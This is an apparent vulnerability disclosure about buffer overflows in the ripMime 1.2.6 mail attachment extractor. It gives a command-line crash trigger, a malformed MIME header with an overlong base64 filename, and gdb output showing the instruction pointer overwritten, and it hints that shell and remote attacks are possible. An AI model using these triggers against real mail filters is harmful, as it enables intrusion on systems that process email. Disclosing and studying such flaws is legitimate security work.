ripMime mail filter remote / local overflows. At least version 1.2.6 vendor: http://www.pldaniels.com/ripmime/ Details: CHANGELOG - 15/11/2001 - 20H57 - v1.2.7 Corrected buffer overflow problems with exceptionally long file names. Corrected filename length problems with OS level fread/write calls. FreeBSD/ports/mail/ripmime/pkg-descr The FreeBSD Ports Collection ("mail/ripmime") You are now in the directory for the port "mail/ripmime" (package name "ripmime-1.2.4"). This is the one-line description for this port: Extracts attached files out of a MIME encoded email package Based on the above info ripmime is part of the FreeBSD ports collection as far as I can tell... I am not totally sure what it is used for becasue its poster application is Commercial and I do not have a copy of the software "XaMime". I do know however that somehow it interfaces with sendmail to strip attachments or filter their content. I have been able to cause a core dump via 2 methods one requires no user intervention and can be done remotely, however it does not yeild an overwrite of the eip. The second method which I explain below could yeild a shell under some circumstances perhaps locally, again I do not know what the full potential use of ripmime is. One possible use is in the above mentioned Commercial application located at: XaMime | Examine your e-mails XaMime Mail and Virusfilter URL: http://www.xamime.de/ or http://www.xamime.com It is some sort of commercial solution for email filtering. ripMime also comes as part of the inflex package used for filtering virii from attachments etc on unix boxen. http://www.spyda.co.za/inflex/mainpage.html or http://www.pldaniels.com/inflex/ Here is an example of the issues at hand ./ripmime -i mail -d `perl -e 'print "A" x 255'` Error: Cannot open output file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_ for BASE64 decoding.Segmentation fault We are using a standard mail file with an incorrect header particularly the BASE64 filename Content-Type: application/octet-stream; name="blah" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAA....<2000 total chars> lets look at this more indepth using gdb. (gdb) r -i mail -d `perl -e 'print "A" x 79'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/ripmime-1.2.6/./ripmime -i mail -d `perl -e 'print "A" x 79'` Error: Cannot open output file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_ for BASE64 decoding. Program received signal SIGILL, Illegal instruction. 0x4141415c in ?? () one more A and we have full eip overwrite. 2079 chars total overwrites the eip we smashed alot of stuff on the way. r0 0x4141415f 1094795615 r19 0x41414141 1094795585 r20 0x41414141 1094795585 r21 0x41414141 1094795585 r22 0x41414141 1094795585 r23 0x41414141 1094795585 r24 0x41414141 1094795585 r25 0x41414141 1094795585 r26 0x41414141 1094795585 r27 0x41414141 1094795585 r28 0x41414141 1094795585 r29 0x41414141 1094795585 r30 0x41414141 1094795585 r31 0x41414141 1094795585 pc 0x4141415c 1094795612 lr 0x4141415f 1094795615 I need to investigate methods of changing defaultdir besides the commandline -d option to take advantage of this one. But of course there are also several other overflows to play with. Once I perfect the remote stuff I will mail out another update. I just didn't want to get caught sleeping again like I did on namazu.cgi. Oh yeah this is NOT limited to BASE64 encoded files... have fun. -KF
